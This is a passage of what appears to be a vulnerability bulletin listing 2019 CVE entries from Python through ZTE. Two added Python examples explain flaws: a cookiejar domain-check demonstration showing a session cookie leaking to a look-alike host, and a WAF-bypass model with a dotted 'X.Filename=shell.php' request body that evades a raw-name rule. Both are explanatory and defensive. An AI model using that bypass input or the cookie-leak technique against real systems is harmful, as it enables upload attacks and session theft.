Description: http.cookiejar.DefaultPolicy.domain_return_ok in Lib/http/cookiejar.py in Python before 3.7.3 does not correctly validate the domain: it can be tricked into sending existing cookies to the wrong server. An attacker may abuse this flaw by using a server with a hostname that has another valid hostname as a suffix (e.g., pythonicexample.com to steal cookies for example.com). When a program uses http.cookiejar.DefaultPolicy and tries to do an HTTP connection to an attacker-controlled server, existing cookies can be leaked to the attacker. This affects 2.x through 2.7.16, 3.x before 3.4.10, 3.5.x before 3.5.7, 3.6.x before 3.6.9, and 3.7.x before 3.7.3.
Published: 2019-07-13
CVSS Score: not yet calculated
Source & Patch Info: CVE-2018-20852; MISC
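The Python entry gives enough detail to reproduce the check. The following added example (a reimplementation for illustration, not the CPython source) shows the pre-fix and post-fix versions of the domain suffix test side by side, then uses the stock http.cookiejar.CookieJar with a constructed session cookie to show which hosts the installed interpreter would send it to; the cookie, the hostnames and the helper names are constructed for the demonstration.

```python
import http.cookiejar
import sys
import urllib.request


def domain_return_ok_vulnerable(domain: str, req_host: str) -> bool:
    """Reimplementation of the pre-3.7.3 suffix test: the request host is
    dot-prefixed but the cookie domain is not, so a plain endswith() lets
    'pythonicexample.com' match a cookie stored for 'example.com'."""
    if not req_host.startswith("."):
        req_host = "." + req_host
    return req_host.endswith(domain)


def domain_return_ok_fixed(domain: str, req_host: str) -> bool:
    """Reimplementation of the corrected test: the cookie domain is also
    dot-prefixed, so a match can only occur on a label boundary."""
    if not req_host.startswith("."):
        req_host = "." + req_host
    dotdomain = domain if domain.startswith(".") else "." + domain
    return req_host.endswith(dotdomain)


def build_jar() -> http.cookiejar.CookieJar:
    """A jar holding one constructed session cookie for example.com, stored
    the way a cookie from a Set-Cookie header without a Domain attribute is
    stored (domain_specified=False, no leading dot)."""
    jar = http.cookiejar.CookieJar()
    cookie = http.cookiejar.Cookie(
        version=0, name="sessionid", value="s3cr3t",
        port=None, port_specified=False,
        domain="example.com", domain_specified=False, domain_initial_dot=False,
        path="/", path_specified=True,
        secure=False, expires=None, discard=True,
        comment=None, comment_url=None, rest={},
    )
    jar.set_cookie(cookie)
    return jar


def cookies_sent_to(jar: http.cookiejar.CookieJar, url: str):
    """Ask the jar which cookies it would attach to a request for url and
    return the resulting Cookie header, or None if nothing is attached."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def interpreter_patched() -> bool:
    """Approximation: True on 3.7.3 and later. The backports on the 3.4, 3.5
    and 3.6 branches (3.4.10, 3.5.7, 3.6.9) are not distinguished here."""
    return sys.version_info >= (3, 7, 3)


def leak_demo() -> dict:
    """Cookie header the installed interpreter would send to the legitimate
    host and to an attacker host that has it as a suffix."""
    jar = build_jar()
    return {
        "example.com": cookies_sent_to(jar, "http://example.com/"),
        "pythonicexample.com": cookies_sent_to(jar, "http://pythonicexample.com/"),
    }


if __name__ == "__main__":
    print("vulnerable suffix test:", domain_return_ok_vulnerable("example.com", "pythonicexample.com"))
    print("fixed suffix test:     ", domain_return_ok_fixed("example.com", "pythonicexample.com"))
    for host, header in leak_demo().items():
        print(f"{host}: {header}")
```

On an interpreter carrying the fix, leak_demo() returns the cookie for example.com only; on 3.7.2 or older the pythonicexample.com entry is populated as well. The reimplemented functions show the one-character-class difference that matters: the suffix must begin at a dot.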

quest -- kace
Description: Quest KACE, all versions prior to version 8.0.x, 8.1.x, and 9.0.x, allows unintentional access to the appliance leveraging functions of the troubleshooting tools located in the administrator user interface.
Published: 2019-07-08
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10973; BID, MISC

rapid7 -- insight_agent
Description: Rapid7 Insight Agent, version 2.6.3 and prior, suffers from a local privilege escalation due to an uncontrolled DLL search path. Specifically, when Insight Agent 2.6.3 and prior starts, the Python interpreter attempts to load python3.dll at "C:\DLLs\python3.dll," which normally is writable by locally authenticated users. Because of this, a malicious local user could use Insight Agent's startup conditions to elevate to SYSTEM privileges. This issue was fixed in Rapid7 Insight Agent 2.6.4.
Published: 2019-07-12
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-5629; MISC, FULLDISC, CONFIRM, BUGTRAQ

razer -- surround
Description: The RzSurroundVADStreamingService (RzSurroundVADStreamingService.exe) in Razer Surround 1.1.63.0 runs as the SYSTEM user using an executable located in %PROGRAMDATA%\Razer\Synapse\Devices\Razer Surround\Driver\. The DACL on this folder allows any user to overwrite contents of files in this folder, resulting in Elevation of Privilege.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13142; MISC

realization -- concerto_critical_chain_planner
Description: Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has SQL Injection in at least the taskupdt/taskdetails.aspx webpage via the projectname parameter.
Published: 2019-07-12
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13027; MISC

red_hat -- openshift_container_platform
Description: A reflected XSS vulnerability exists in the authorization flow of OpenShift Container Platform versions: openshift-online-3, openshift-enterprise-3.4 through 3.7 and openshift-enterprise-3.9 through 3.11. An attacker could use this flaw to steal authorization data by getting a user to click on a malicious link.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-3889; CONFIRM

rockwell_automation -- panelview_5510
Description: In Rockwell Automation PanelView 5510 (all versions manufactured before March 13, 2019 that have never been updated to v4.003, v5.002, or later), a remote, unauthenticated threat actor with access to an affected PanelView 5510 Graphic Display, upon successful exploit, may boot-up the terminal and gain root-level access to the device's file system.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10970; BID, MISC

sap -- abap_server_and_abap_platform
Description: ABAP Server and ABAP Platform (SAP Basis), versions 7.31, 7.4, 7.5, do not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0321; BID, MISC, CONFIRM

sap -- businessobjects_business_intelligence_platform
Description: SAP BusinessObjects Business Intelligence Platform (BI Workspace) (Enterprise), versions 4.1, 4.2, 4.3, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0326; BID, MISC, CONFIRM

sap -- commerce_cloud
Description: SAP Commerce Cloud (previously known as SAP Hybris Commerce), (HY_COM, versions 6.3, 6.4, 6.5, 6.6, 6.7, 1808, 1811), allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0322; BID, MISC, CONFIRM

sap -- diagnostic_agent
Description: The OS Command Plugin in the transaction GPA_ADMIN and the OSCommand Console of SAP Diagnostic Agent (LM-Service), version 7.2, allow an attacker to inject code that can be executed by the application. An attacker could thereby control the behavior of the application.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0330; BID, MISC, CONFIRM

sap -- erp_hcm
Description: SAP ERP HCM (SAP_HRCES), version 3, does not perform necessary authorization checks for a report that reads payroll data of employees in a certain area. Due to this, under certain conditions, a user who once had authorization to payroll data of an employee, which was later revoked, may retain access to the same data.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0325; BID, MISC, CONFIRM

sap -- netweaver_application_server
Description: Under certain conditions SAP NetWeaver Application Server for Java (Startup Framework), versions 7.21, 7.22, 7.45, 7.49, and 7.53, allows an attacker to access information which would otherwise be restricted.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0318; BID, MISC, CONFIRM

sap -- netweaver_for_java_application_server
Description: SAP NetWeaver for Java Application Server - Web Container, (engineapi, versions 7.1, 7.2, 7.3, 7.31, 7.4 and 7.5), (servercode, versions 7.2, 7.3, 7.31, 7.4, 7.5), allows an attacker to upload files (including script files) without proper file format validation.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0327; BID, MISC, CONFIRM

sap -- netweaver_process_integration
Description: ABAP Tests Modules (SAP Basis, versions 7.0, 7.1, 7.3, 7.31, 7.4, 7.5) of SAP NetWeaver Process Integration allow an attacker to execute OS commands with privileged rights. An attacker could thereby impact the integrity and availability of the system.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0328; BID, MISC, CONFIRM

sap -- sap_gateway
Description: The SAP Gateway, versions 7.5, 7.51, 7.52 and 7.53, allows an attacker to inject content which is displayed in the form of an error message. An attacker could thus mislead a user to believe this information is from the legitimate service when it's not.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0319; BID, MISC, CONFIRM

sap -- sapui5_and_openui5
Description: SAPUI5 and OpenUI5, before versions 1.38.39, 1.44.39, 1.52.25, 1.60.6 and 1.63.0, do not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-0281; BID, MISC, CONFIRM

schedmd -- slurm
Description: SchedMD Slurm 17.11.x, 18.08.0 through 18.08.7, and 19.05.0 allows SQL Injection.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12838; MISC, CONFIRM

siemens -- simatic_pcs_7_and_simatic_wincc_products
Description: A vulnerability has been identified in SIMATIC PCS 7 V8.0 and earlier (All versions), SIMATIC PCS 7 V8.1 (All versions), SIMATIC PCS 7 V8.2 (All versions < V8.2 SP1 with WinCC V7.4 SP1 Upd11), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP2 with WinCC V7.4 SP1 Upd11), SIMATIC WinCC Professional (TIA Portal V13) (All versions), SIMATIC WinCC Professional (TIA Portal V14) (All versions), SIMATIC WinCC Professional (TIA Portal V15) (All versions), SIMATIC WinCC Runtime Professional V13 (All versions), SIMATIC WinCC Runtime Professional V14 (All versions), SIMATIC WinCC Runtime Professional V15 (All versions), SIMATIC WinCC V7.2 and earlier (All versions), SIMATIC WinCC V7.3 (All versions), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Upd 11), SIMATIC WinCC V7.5 (All versions < V7.5 Upd 3). The SIMATIC WinCC DataMonitor web application of the affected products allows the upload of arbitrary ASPX code. The security vulnerability could be exploited by an authenticated attacker with network access to the WinCC DataMonitor application. No user interaction is required to exploit this vulnerability. The vulnerability impacts confidentiality, integrity, and availability of the affected device. At the stage of publishing this security advisory no public exploitation is known.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10935; BID, MISC

siemens -- siprotec_5_devices
Description: A vulnerability has been identified in SIPROTEC 5 device types 6MD85, 6MD86, 6MD89, 7UM85, 7SA87, 7SD87, 7SL87, 7VK87, 7SA82, 7SA86, 7SD82, 7SD86, 7SL82, 7SL86, 7SJ86, 7SK82, 7SK85, 7SJ82, 7SJ85, 7UT82, 7UT85, 7UT86, 7UT87 and 7VE85 with CPU variants CP300 and CP100 and the respective Ethernet communication modules (All versions < V7.90), all other SIPROTEC 5 device types with CPU variants CP300 and CP100 and the respective Ethernet communication modules (All versions), SIPROTEC 5 relays with CPU variants CP200 and the respective Ethernet communication modules (All versions), DIGSI 5 engineering software (All versions < V7.90). Specially crafted packets sent to port 443/TCP could cause a Denial of Service condition.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10931; MISC

siemens -- siprotec_5_devices
Description: A vulnerability has been identified in SIPROTEC 5 device types 6MD85, 6MD86, 6MD89, 7UM85, 7SA87, 7SD87, 7SL87, 7VK87, 7SA82, 7SA86, 7SD82, 7SD86, 7SL82, 7SL86, 7SJ86, 7SK82, 7SK85, 7SJ82, 7SJ85, 7UT82, 7UT85, 7UT86, 7UT87 and 7VE85 with CPU variants CP300 and CP100 and the respective Ethernet communication modules (All versions < V7.90), all other SIPROTEC 5 device types with CPU variants CP300 and CP100 and the respective Ethernet communication modules (All versions), SIPROTEC 5 relays with CPU variants CP200 and the respective Ethernet communication modules (All versions), DIGSI 5 engineering software (All versions < V7.90). A remote attacker could use specially crafted packets sent to port 443/TCP to upload, download or delete files in certain parts of the file system.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10930; MISC

siemens -- spectrum_power_products
Description: A vulnerability has been identified in Spectrum Power 3 (Corporate User Interface) (All versions <= v3.11), Spectrum Power 4 (Corporate User Interface) (Version v4.75), Spectrum Power 5 (Corporate User Interface) (All versions <= v5.50), Spectrum Power 7 (Corporate User Interface) (All versions <= v2.20). The web server could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link. User interaction is required for a successful exploitation. The user does not need to be logged into the web interface in order for the exploitation to succeed. At the stage of publishing this security advisory no public exploitation is known.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10933; MISC

siemens -- tia_administrator
Description: A vulnerability has been identified in TIA Administrator (All versions < V1.0 SP1 Upd1). The integrated configuration web application (TIA Administrator) allows the execution of certain application commands without proper authentication. The vulnerability could be exploited by an attacker with local access to the affected system. Successful exploitation requires no privileges and no user interaction. An attacker could use the vulnerability to compromise confidentiality, integrity and availability of the affected system. At the time of advisory publication no public exploitation of this security vulnerability was known.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-10915; BID, MISC

snapview -- mikogo
Description: The Windows versions of Snapview Mikogo before 5.10.2 are affected by insecure implementations which allow local attackers to escalate privileges.
Published: 2019-07-12
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12731; MISC

sonatype -- nexus_repository_manager
Description: Sonatype Nexus Repository Manager before 3.17.0 has a weak default of giving any unauthenticated user read permissions on the repository files and images.
Published: 2019-07-08
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-9630; MISC

sonatype -- nexus_repository_manager
Description: Sonatype Nexus Repository Manager before 3.17.0 establishes a default administrator user with weak defaults (fixed credentials).
Published: 2019-07-08
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-9629; MISC

sony -- bravia_smart_tv_devices
Description: Sony BRAVIA Smart TV devices allow remote attackers to cause a denial of service (device hang) via a crafted web page over HbbTV.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-11889; MISC, FULLDISC

sony -- bravia_smart_tv_devices
Description: Sony BRAVIA Smart TV devices allow remote attackers to cause a denial of service (device hang or reboot) via a SYN flood attack over a wired or Wi-Fi LAN.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-11890; MISC, FULLDISC

spiderlabs -- owasp_modsecurity_core_rule_set
Description: An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) 3.0.2. Use of X.Filename instead of X_Filename can bypass some PHP Script Uploads rules, because PHP automatically transforms dots into underscores in certain contexts where dots are invalid.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13464; MISC
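The CRS entry is an instance of a normalization gap: the backend sees a parameter name under one spelling, the WAF matched it under another. The following added example (not the CRS rules and not ModSecurity code) models PHP's documented rewriting of external variable names, where a dot or space in a $_GET/$_POST key becomes an underscore, and shows a rule that matches raw wire names being bypassed while the same rule applied after normalization still fires. The request bodies are constructed and the name list is a hypothetical stand-in for the CRS upload rule, not a copy of it.

```python
from urllib.parse import parse_qsl


def php_normalize_name(name: str) -> str:
    """PHP's documented treatment of external variable names ($_GET/$_POST
    keys): '.' and ' ' are invalid in an identifier and are rewritten to '_',
    so the application sees X.Filename as X_Filename."""
    return name.replace(".", "_").replace(" ", "_")


# Constructed rule: parameter names that a "PHP script upload" rule treats as
# evidence of an upload attempt. The real CRS name list is not reproduced here.
UPLOAD_NAME_RULE = {"x-filename", "x_filename", "x-file-name"}


def param_names(body: str) -> list:
    """Parameter names from an application/x-www-form-urlencoded body, in wire order."""
    return [name for name, _ in parse_qsl(body, keep_blank_values=True)]


def matches_raw(names) -> list:
    """Bypassable: compares the wire spelling against the rule list."""
    return [n for n in names if n.lower() in UPLOAD_NAME_RULE]


def matches_normalized(names) -> list:
    """Hardened: evaluates the rule on the spelling the backend will use and
    returns the original wire names that matched, for logging."""
    return [n for n in names if php_normalize_name(n).lower() in UPLOAD_NAME_RULE]


# Constructed request bodies: the first is what the rule was written for, the
# second uses the dotted spelling from the entry.
DIRECT_BODY = "X_Filename=shell.php&data=..."
EVASIVE_BODY = "X.Filename=shell.php&data=..."


def demo() -> dict:
    """Run both bodies through the raw and the normalized matcher."""
    out = {}
    for label, body in (("direct", DIRECT_BODY), ("evasive", EVASIVE_BODY)):
        names = param_names(body)
        out[label] = {"raw": matches_raw(names), "normalized": matches_normalized(names)}
    return out


if __name__ == "__main__":
    for label, r in demo().items():
        print(f"{label}: raw={r['raw']} normalized={r['normalized']}")
```

The general rule the example illustrates is to inspect what the backend will parse rather than the bytes on the wire; any inspector sitting in front of a parser with its own canonicalisation has to apply that canonicalisation first.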

squid-cache -- squid
Description: An issue was discovered in Squid 4.0.23 through 4.7. When checking Basic Authentication with HttpHeader::getAuth, Squid uses a global buffer to store the decoded data. Squid does not check that the decoded length isn't greater than the buffer, leading to a heap-based buffer overflow with user controlled data.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12527; CONFIRM

squid-cache -- squid
Description: An issue was discovered in Squid 3.3.9 through 3.5.28 and 4.x through 4.7. When Squid is configured to use Digest authentication, it parses the header Proxy-Authorization. It searches for certain tokens such as domain, uri, and qop. Squid checks if this token's value starts with a quote and ends with one. If so, it performs a memcpy of its length minus 2. Squid never checks whether the value is just a single quote (which would satisfy its requirements), leading to a memcpy of its length minus 1.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12525; CONFIRM

squid-cache -- squid
Description: An issue was discovered in Squid 2.x through 2.7.STABLE9, 3.x through 3.5.28, and 4.x through 4.7. When Squid is configured to use Basic Authentication, the Proxy-Authorization header is parsed via uudecode. uudecode determines how many bytes will be decoded by iterating over the input and checking its table. The length is then used to start decoding the string. There are no checks to ensure that the length it calculates isn't greater than the input buffer. This leads to adjacent memory being decoded as well. An attacker would not be able to retrieve the decoded data unless the Squid maintainer had configured the display of usernames on error pages.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12529; CONFIRM

stopzilla -- stopzilla_antimalware
Description: An issue was discovered in STOPzilla AntiMalware 6.5.2.59. The driver file szkg64.sys contains an Arbitrary Write vulnerability due to not validating the output buffer address value from IOCtl 0x8000205F.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2018-15738; MISC

sunnet -- wmpro
Description: The SUNNET WMPro v5.0 and v5.1 eLearning system has OS Command Injection via "/teach/course/doajaxfileupload.php". The target server can be exploited without authentication.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-11062; CONFIRM

swift -- alliance_web_platform
Description: An issue was discovered in SWIFT Alliance Web Platform 7.1.23. A log injection (and an arbitrary log filename) can be achieved via the PATH_INFO to swp/login/EJBRemoteService/, related to com.swift.ejbgwt.j2ee.client.EjBInvocationException error log information containing null@java:comp/env/ error messages.
Published: 2019-07-05
CVSS Score: not yet calculated
Source & Patch Info: CVE-2018-16386; MISC

symantec -- messaging_gateway
Description: Symantec Messaging Gateway, prior to 10.7.1, may be susceptible to a privilege escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12751; BID, MISC

thoughtspot -- thoughtspot
Description: An authorization bypass vulnerability in pinboard updates in ThoughtSpot 4.4.1 through 5.1.1 (before 5.1.2) allows a low-privilege user with write access to at least one pinboard to corrupt pinboards of another user in the application by spoofing GUIDs in pinboard update requests, effectively deleting them.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12782; MISC, CONFIRM

trendnet -- tew-827dru
Description: TRENDnet TEW-827DRU with firmware up to and including 2.04B03 contains multiple stack-based buffer overflows when processing user input for the setup wizard, allowing an unauthenticated user to execute arbitrary code. The vulnerability can be exercised on the local intranet or remotely if remote administration is enabled.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13279; MISC

trendnet -- tew-827dru
Description: TRENDnet TEW-827DRU with firmware up to and including 2.04B03 allows an unauthenticated attacker to execute setup wizard functionality, giving this attacker the ability to change configuration values, potentially leading to a denial of service. The request can be made on the local intranet or remotely if remote administration is enabled.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13277; MISC

trendnet -- tew-827dru
Description: TRENDnet TEW-827DRU with firmware up to and including 2.04B03 contains multiple command injections when processing user input for the setup wizard, allowing an unauthenticated user to run arbitrary commands on the device. The vulnerability can be exercised on the local intranet or remotely if remote administration is enabled.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13278; MISC

trendnet -- tew-827dru
Description: TRENDnet TEW-827DRU with firmware up to and including 2.04B03 contains a stack-based buffer overflow in the ssi binary. The overflow allows an unauthenticated user to execute arbitrary code by providing a sufficiently long query string when POSTing to any valid cgi, txt, asp, or js file. The vulnerability can be exercised on the local intranet or remotely if remote administration is enabled.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13276; MISC

trendnet -- tew-827dru
Description: TRENDnet TEW-827DRU with firmware up to and including 2.04B03 contains a stack-based buffer overflow while returning an error message to the user about failure to resolve a hostname during a ping or traceroute attempt. This allows an authenticated user to execute arbitrary code. The exploit can be exercised on the local intranet or remotely if remote administration is enabled.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13280; MISC

u.s._army -- america's_army_proving_grounds
Description: An issue was discovered in the America's Army Proving Grounds platform for the Unreal Engine. With a false packet sent via UDP, the application server responds with several bytes, giving the possibility of DoS amplification, even being able to be used in DDoS attacks.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2018-10531; MISC

ubiquiti_networks -- edgemax_edgeswitch
Description: Command Injection in EdgeMAX EdgeSwitch prior to 1.8.2 allows an Admin user to execute commands as root.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-5446; MISC

ubiquiti_networks -- edgemax_edgeswitch
Description: DoS in EdgeMAX EdgeSwitch prior to 1.8.2 allows an Admin user to crash the SSH CLI interface by using crafted commands.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-5445; MISC

vmware -- esxi
Description: VMware ESXi 6.5 suffers from a partial denial of service vulnerability in the hostd process. Patch ESXi650-201907201-UG for this issue is available.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-5528; BID, CONFIRM

wavpack -- wavpack
Description: WavPack 5.1.0 and earlier is affected by: CWE-457: Use of Uninitialized Variable. The impact is: Unexpected control flow, crashes, and segfaults. The component is: ParseWave64HeaderConfig (wave64.c:211). The attack vector is: Maliciously crafted .wav file. The fixed version is: After commit https://github.com/dbry/WavPack/commit/33a0025d1d63ccd05d9dbaa6923d52b1446a62fe.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-1010319; MISC

wavpack -- wavpack
Description: WavPack 5.1.0 and earlier is affected by: CWE-457: Use of Uninitialized Variable. The impact is: Unexpected control flow, crashes, and segfaults. The component is: ParseCaffHeaderConfig (caff.c:486). The attack vector is: Maliciously crafted .wav file. The fixed version is: After commit https://github.com/dbry/WavPack/commit/f68a9555b548306c5b1ee45199ccdc4a16a6101b.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-1010317; MISC

wavpack -- wavpack
Description: WavPack 5.1 and earlier is affected by: CWE-369: Divide by Zero. The impact is: Divide by zero can lead to sudden crash of a software/service that tries to parse a .wav file. The component is: ParseDsdiffHeaderConfig (dsdiff.c:282). The attack vector is: Maliciously crafted .wav file. The fixed version is: After commit https://github.com/dbry/WavPack/commit/4c0faba32fddbd0745cbfaf1e1aeb3da5d35b9fc.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-1010315; MISC

weseek -- growi
Description: In WESEEK GROWI before 3.5.0, the site-wide basic authentication can be bypassed by adding a URL parameter access_token (this is the parameter used by the API). No valid token is required since it is not validated by the backend. The website can then be browsed as if no basic authentication is required.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13337; MISC

weseek -- growi
Description: In WESEEK GROWI before 3.5.0, a remote attacker can obtain the password hash of the creator of a page by leveraging wiki access to make API calls for page metadata. In other words, the password hash can be retrieved even though it is not a publicly available field.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13338; MISC

wolfvision -- cynap
Description: WolfVision Cynap before 1.30j uses a static, hard-coded cryptographic secret for generating support PINs for the 'forgot password' feature. By knowing this static secret and the corresponding algorithm for calculating support PINs, an attacker can reset the ADMIN password and thus gain remote access.
Published: 2019-07-05
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13352; MISC, FULLDISC

wordpress -- wordpress
Description: The Rencontre plugin before 3.1.3 for WordPress allows SQL Injection via inc/rencontre_widget.php.
Published: 2019-07-08
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13413; MISC

wordpress -- wordpress
Description: The Rencontre plugin before 3.1.3 for WordPress allows XSS via inc/rencontre_widget.php.
Published: 2019-07-08
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13414; MISC

zeromq -- libzmq
Description: In ZeroMQ libzmq before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.3.2, a remote, unauthenticated client connecting to a libzmq application, running with a socket listening with CURVE encryption/authentication enabled, may cause a stack overflow and overwrite the stack with arbitrary data, due to a buffer overflow in the library. Users running public servers with the above configuration are highly encouraged to upgrade as soon as possible, as there are no known mitigations.
Published: 2019-07-10
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13132; MLIST, CONFIRM, BUGTRAQ, UBUNTU, DEBIAN

zoho_manageengine -- assetexplorer
Description: An issue was discovered in Zoho ManageEngine AssetExplorer. There is XSS via the SearchN.do search field.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12537; MISC

zoho_manageengine -- servicedesk_plus
Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 10.5. There is XSS via the WorkOrder.do search field.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-12540; MISC

zoom_video_communications -- zoom_client
Description: In the Zoom Client before 4.4.2 on macOS, remote attackers can cause a denial of service (continual focus grabs) via a sequence of invalid launch?action=join&confno= requests to localhost port 19421.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13449; MISC

zoom_video_communications -- zoom_client
Description: The Zoom Client before 4.4.53932.0709 on macOS allows remote code execution, a different vulnerability than CVE-2019-13450. If the ZoomOpener daemon (aka the hidden web server) is running, but the Zoom Client is not installed or can't be opened, an attacker can remotely execute code with a maliciously crafted launch URL. NOTE: ZoomOpener is removed by the Apple Malware Removal Tool (MRT) if this tool is enabled and has the 2019-07-10 MRTConfigData.
Published: 2019-07-12
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13567; MISC

zoom_video_communications -- zoom_client_and_ringcentral
Description: In the Zoom Client through 4.4.4 and RingCentral 7.0.136380.0312 on macOS, remote attackers can force a user to join a video call with the video camera active. This occurs because any web site can interact with the Zoom web server on localhost port 19421 or 19424. NOTE: a machine remains vulnerable if the Zoom Client was installed in the past and then uninstalled. Blocking exploitation requires additional steps, such as the ZDisableVideo preference and/or killing the web server, deleting the ~/.zoomus directory, and creating a ~/.zoomus plain file.
Published: 2019-07-09
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-13450; BID, MISC

zte -- mw_nr8000
Description: ZTE MW NR8000V2.4.4.03 and NR8000V2.4.4.04 are impacted by a path traversal vulnerability. Due to the path traversal, users can download any files.
Published: 2019-07-11
CVSS Score: not yet calculated
Source & Patch Info: CVE-2019-3415; MISC
